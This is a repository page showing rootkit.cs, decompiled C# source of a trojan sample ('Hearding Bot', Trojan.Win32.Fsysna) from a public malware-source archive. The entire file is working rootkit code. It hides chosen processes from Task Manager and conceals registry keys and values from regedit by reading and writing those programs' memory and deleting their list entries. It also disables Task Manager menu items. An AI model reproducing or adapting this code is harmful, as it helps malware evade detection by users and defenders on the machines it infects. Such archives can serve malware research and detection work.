ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-12 13:25:30 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a/rootkit.cs

565 lines
19 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Hearding_Bot.rootkit
// Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;
namespace Hearding_Bot
{
internal class rootkit
{
public static bool Initialized1;
public static bool Initialized2;
public static bool Initialized3;
public static DateTime TaskManagerTime = DateTime.Now;
public static int TaskManagerCount;
public static bool TaskManagerReload;
public static List<string[]> RegistryKeys = new List<string[]>();
public static void Initialize(int proc)
{
switch (proc)
{
case 1:
new Thread((ThreadStart) (() =>
{
while (true)
{
rootkit._HideProcess();
Thread.Sleep(500);
}
})).Start();
rootkit.Initialized1 = true;
break;
case 2:
new Thread((ThreadStart) (() =>
{
while (true)
Thread.Sleep(rootkit._HideRegistryValue() ? 10 : 250);
})).Start();
rootkit.Initialized2 = true;
break;
case 3:
new Thread((ThreadStart) (() =>
{
while (true)
Thread.Sleep(rootkit._HideRegistryKey() ? 10 : 250);
})).Start();
rootkit.Initialized3 = true;
break;
}
}
public static void _HideProcess()
{
try
{
IntPtr mainWindowHandle = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle;
rootkit.Api.WindowPlacement lpwndpl = new rootkit.Api.WindowPlacement();
lpwndpl.length = Marshal.SizeOf((object) lpwndpl);
rootkit.Api.GetWindowPlacement(mainWindowHandle, ref lpwndpl);
bool flag1 = lpwndpl.showCmd == 1 || lpwndpl.showCmd == 3;
IntPtr dlgItem = rootkit.Api.GetDlgItem(rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
IntPtr menu = rootkit.Api.GetMenu(mainWindowHandle);
IntPtr subMenu1 = rootkit.Api.GetSubMenu(menu, 2);
IntPtr subMenu2 = rootkit.Api.GetSubMenu(subMenu1, 1);
uint menuItemId = rootkit.Api.GetMenuItemID(subMenu1, 0);
if (subMenu2 != IntPtr.Zero)
{
rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) rootkit.Api.GetMenuItemID(subMenu2, 3), IntPtr.Zero);
rootkit.Api.RemoveMenu(subMenu1, (uint) (int) subMenu2, 1U);
}
rootkit.Api.EnableMenuItem(menu, menuItemId, 1U);
if (flag1)
rootkit.Api.LockWindowUpdate(dlgItem);
if ((DateTime.Now - rootkit.TaskManagerTime).TotalMilliseconds > 1000.0)
{
rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) menuItemId, IntPtr.Zero);
rootkit.TaskManagerTime = DateTime.Now;
}
GC.Collect();
int num = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, "");
if (num != rootkit.TaskManagerCount || rootkit.TaskManagerReload)
{
rootkit.TaskManagerReload = false;
rootkit.TaskManagerCount = num;
for (int index1 = 0; index1 < num; ++index1)
{
string[] strArray = new string[10];
for (int subitem = 0; subitem < 10; ++subitem)
{
strArray[subitem] = rootkit.GetListViewItem(dlgItem, index1, subitem).ToLower();
if (subitem > 0 && strArray[subitem] == strArray[0])
break;
}
foreach (rootkit.Proc proc in rootkit.Proc.List)
{
bool flag2 = false;
bool flag3 = false;
for (int index2 = 0; index2 < 10 && strArray[index2] != null && (!flag2 || !flag3); ++index2)
{
if (strArray[index2].StartsWith(proc.Name))
flag2 = true;
else if (strArray[index2] == proc.User)
flag3 = true;
}
if (flag2 && flag3)
{
rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index1--, IntPtr.Zero);
--rootkit.TaskManagerCount;
break;
}
}
}
}
if (!flag1)
return;
rootkit.Api.LockWindowUpdate(IntPtr.Zero);
}
catch
{
}
}
public static bool _HideRegistryValue()
{
bool flag = false;
try
{
IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
flag = true;
rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null);
IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 2);
string statusBarText = rootkit.GetStatusBarText(rootkit.Api.GetDlgItem(mainWindowHandle, 3), 0);
string lower = statusBarText.Substring(statusBarText.IndexOf("\\") + 1).ToLower();
int num1 = 0;
RegistryKey registryKey = (RegistryKey) null;
foreach (rootkit.RegVal regVal in rootkit.RegVal.List)
{
if (regVal.Key == lower)
{
registryKey = regVal.RegKey;
++num1;
}
}
if (num1 > 0)
{
int num2 = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, IntPtr.Zero);
if (num2 != registryKey.ValueCount + 1 - num1)
{
rootkit.Api.LockWindowUpdate(dlgItem);
for (int index = 1; index < num2; ++index)
{
foreach (rootkit.RegVal regVal in rootkit.RegVal.List)
{
if (regVal.Key == lower && regVal.Value == rootkit.GetListViewItem(dlgItem, index, 0).ToLower())
rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index--, IntPtr.Zero);
}
}
rootkit.Api.LockWindowUpdate(IntPtr.Zero);
}
}
}
catch
{
}
return flag;
}
public static bool _HideRegistryKey()
{
bool flag = false;
try
{
IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
flag = true;
rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null);
IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 1);
int index = rootkit.Api.SendMessage(dlgItem, 4362, 4U, (IntPtr) rootkit.Api.SendMessage(dlgItem, 4362, 0U, IntPtr.Zero));
IntPtr num1 = Marshal.AllocHGlobal(1024);
int lpwdProcessID;
rootkit.Api.GetWindowThreadProcessId(dlgItem, out lpwdProcessID);
IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, lpwdProcessID);
IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
rootkit.ExtractRegKey(num2, dlgItem, index, num1, num3, new List<string>());
Marshal.FreeHGlobal(num1);
rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U);
rootkit.Api.CloseHandle(num2);
GC.Collect();
}
catch
{
}
return flag;
}
public static void HideProcess(Process process)
{
if (!rootkit.Initialized1)
rootkit.Initialize(1);
rootkit.Proc proc = new rootkit.Proc(process);
rootkit.TaskManagerReload = true;
}
public static void HideRegistryValue(RegistryKey key, string value)
{
if (!rootkit.Initialized2)
rootkit.Initialize(2);
rootkit.RegVal regVal = new rootkit.RegVal(key, value);
}
public static void HideRegistryKey(RegistryKey key)
{
if (!rootkit.Initialized3)
rootkit.Initialize(3);
rootkit.RegistryKeys.Add(key.Name.ToLower().Split('\\'));
}
public static void ExtractRegKey(
IntPtr hProcess,
IntPtr hTreeview,
int index,
IntPtr lpLocalBuffer,
IntPtr lpRemoteBuffer,
List<string> stack)
{
for (; index > 0; index = rootkit.Api.SendMessage(hTreeview, 4362, 1U, (IntPtr) index))
{
rootkit.Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref new rootkit.Api.TvItem()
{
mask = 1,
hItem = (IntPtr) index,
pszText = (IntPtr) ((int) lpRemoteBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem))),
cchTextMax = (int) byte.MaxValue
}, Marshal.SizeOf(typeof (rootkit.Api.TvItem)), IntPtr.Zero);
rootkit.Api.SendMessage(hTreeview, 4364, 0U, lpRemoteBuffer);
rootkit.Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, IntPtr.Zero);
string lower = Marshal.PtrToStringAnsi((IntPtr) ((int) lpLocalBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem)))).ToLower();
if (index > 0)
{
int index1 = rootkit.Api.SendMessage(hTreeview, 4362, 4U, (IntPtr) index);
stack.Add(lower);
bool flag1 = false;
foreach (string[] registryKey in rootkit.RegistryKeys)
{
if (stack.Count == registryKey.Length)
{
bool flag2 = true;
for (int index2 = 0; index2 < stack.Count; ++index2)
{
if (stack[index2] != registryKey[index2])
{
flag2 = false;
break;
}
}
if (flag2)
{
flag1 = true;
break;
}
}
}
stack.RemoveAt(stack.Count - 1);
if (flag1)
rootkit.Api.SendMessage(hTreeview, 4353, 4U, (IntPtr) index);
else if (index1 > 0)
{
stack.Add(lower);
rootkit.ExtractRegKey(hProcess, hTreeview, index1, lpLocalBuffer, lpRemoteBuffer, new List<string>((IEnumerable<string>) stack.ToArray()));
stack.RemoveAt(stack.Count - 1);
}
}
}
}
public static string GetStatusBarText(IntPtr handle, int index)
{
int dwSize = ((int) rootkit.Api.SendMessage(handle, 1036U, (IntPtr) index, IntPtr.Zero) & (int) ushort.MaxValue) * 2;
uint lpdwProcessId = 0;
int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(handle, out lpdwProcessId);
IntPtr num1 = rootkit.Api.OpenProcess(2033663U, false, (int) lpdwProcessId);
IntPtr num2 = rootkit.Api.VirtualAllocEx(num1, IntPtr.Zero, (uint) dwSize, 12288U, 4U);
int numberOfBytesRead = 0;
byte[] buffer = new byte[dwSize];
rootkit.Api.SendMessage(handle, 1037U, (IntPtr) index, num2);
rootkit.Api.ReadProcessMemory(num1, num2, buffer, dwSize, out numberOfBytesRead);
string statusBarText = "";
for (int index1 = 0; index1 < buffer.Length; index1 += 2)
statusBarText += (string) (object) Convert.ToChar((int) buffer[index1] | (int) buffer[index1 + 1] << 8);
rootkit.Api.CloseHandle(num1);
return statusBarText;
}
public static string GetListViewItem(IntPtr hWnd, int index, int subitem)
{
rootkit.Api.LvItem buffer = new rootkit.Api.LvItem();
IntPtr num1 = Marshal.AllocHGlobal(1024);
uint lpdwProcessId;
int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(hWnd, out lpdwProcessId);
IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, (int) lpdwProcessId);
IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
buffer.mask = 1U;
buffer.iItem = index;
buffer.iSubItem = subitem;
buffer.pszText = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (rootkit.Api.LvItem)));
buffer.cchTextMax = 50;
rootkit.Api.WriteProcessMemory(num2, num3, ref buffer, Marshal.SizeOf(typeof (rootkit.Api.LvItem)), 0);
rootkit.Api.SendMessage(hWnd, 4101U, IntPtr.Zero, num3);
rootkit.Api.ReadProcessMemory(num2, num3, num1, 1024, 0);
string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) num1 + Marshal.SizeOf(typeof (rootkit.Api.LvItem))));
Marshal.FreeHGlobal(num1);
rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U);
rootkit.Api.CloseHandle(num2);
return stringAnsi;
}
public static string GetProcessUser(Process process)
{
foreach (ManagementObject managementObject in new ManagementObjectSearcher("Select * From Win32_Process Where ProcessID = " + (object) process.Id).Get())
{
string[] args = new string[1]{ "" };
if (Convert.ToInt32(managementObject.InvokeMethod("GetOwner", (object[]) args)) == 0)
return args[0];
}
return "";
}
public class Proc
{
public static List<rootkit.Proc> List = new List<rootkit.Proc>();
public string Name;
public string User;
public Proc(Process proc)
{
this.Name = proc.ProcessName.ToLower();
this.User = rootkit.GetProcessUser(proc).ToLower();
lock (rootkit.Proc.List)
rootkit.Proc.List.Add(this);
}
}
public class RegVal
{
public static List<rootkit.RegVal> List = new List<rootkit.RegVal>();
public RegistryKey RegKey;
public string Key;
public string Value;
public RegVal(RegistryKey key, string value)
{
this.RegKey = key;
this.Key = key.Name.ToLower();
this.Value = value.ToLower();
lock (rootkit.RegVal.List)
rootkit.RegVal.List.Add(this);
}
}
internal static class Api
{
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr FindWindowEx(
IntPtr hwndParent,
IntPtr hwndChildAfter,
string lpszClass,
string lpszWindow);
[DllImport("user32.dll")]
public static extern IntPtr GetDlgItem(IntPtr hDlg, int nIDDlgItem);
[DllImport("user32.dll")]
public static extern bool EnableWindow(IntPtr hWnd, bool bEnable);
[DllImport("user32.dll")]
public static extern IntPtr GetMenu(IntPtr hWnd);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetSubMenu(IntPtr hMenu, int nPos);
[DllImport("user32.dll")]
public static extern uint GetMenuItemID(IntPtr hMenu, int nPos);
[DllImport("user32.dll")]
public static extern bool EnableMenuItem(IntPtr hMenu, uint uIDEnableItem, uint uEnable);
[DllImport("user32.dll")]
public static extern bool RemoveMenu(IntPtr hMenu, uint uPosition, uint uFlags);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr SendMessage(
IntPtr hWnd,
uint Msg,
IntPtr wParam,
IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr SendMessage(
IntPtr hWnd,
uint Msg,
IntPtr wParam,
string lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr SendMessage(
IntPtr hWnd,
[MarshalAs(UnmanagedType.U4)] int msg,
IntPtr wParam,
ref rootkit.Api.TvItem item);
[DllImport("user32.dll")]
public static extern int SendMessage(IntPtr hWnd, int Msg, uint wParam, IntPtr lParam);
[DllImport("user32.dll")]
public static extern bool LockWindowUpdate(IntPtr hWndLock);
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetWindowPlacement(
IntPtr hWnd,
ref rootkit.Api.WindowPlacement lpwndpl);
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(
uint dwDesiredAccess,
[MarshalAs(UnmanagedType.Bool)] bool bInheritHandle,
int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
uint flAllocationType,
uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool VirtualFreeEx(
IntPtr hProcess,
IntPtr lpAddress,
int dwSize,
uint dwFreeType);
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(
IntPtr hProcess,
IntPtr baseAddress,
byte[] buffer,
int dwSize,
out int numberOfBytesRead);
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
int dwSize,
int lpNumberOfBytesRead);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
ref rootkit.Api.TvItem buffer,
int dwSize,
IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
ref rootkit.Api.LvItem buffer,
int dwSize,
int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
int dwSize,
IntPtr lpNumberOfBytesRead);
[DllImport("user32.dll", SetLastError = true)]
public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll")]
public static extern IntPtr GetWindowThreadProcessId(IntPtr hWnd, out int lpwdProcessID);
public struct LvItem
{
public uint mask;
public int iItem;
public int iSubItem;
public uint state;
public uint stateMask;
public IntPtr pszText;
public int cchTextMax;
public int iImage;
}
public struct TvItem
{
public int mask;
public IntPtr hItem;
public int state;
public int stateMask;
public IntPtr pszText;
public int cchTextMax;
public int iImage;
public int iSelectedImage;
public int cChildren;
public IntPtr lParam;
public int iIntegral;
}
public struct Rect
{
private int left;
private int top;
private int right;
private int bottom;
}
public struct Point
{
private int x;
private int y;
}
public struct WindowPlacement
{
public int length;
public int flags;
public int showCmd;
public rootkit.Api.Point ptMinPosition;
public rootkit.Api.Point ptMaxPosition;
public rootkit.Api.Rect rcNormalPosition;
}
}
}
}
Reference in New Issue Copy Permalink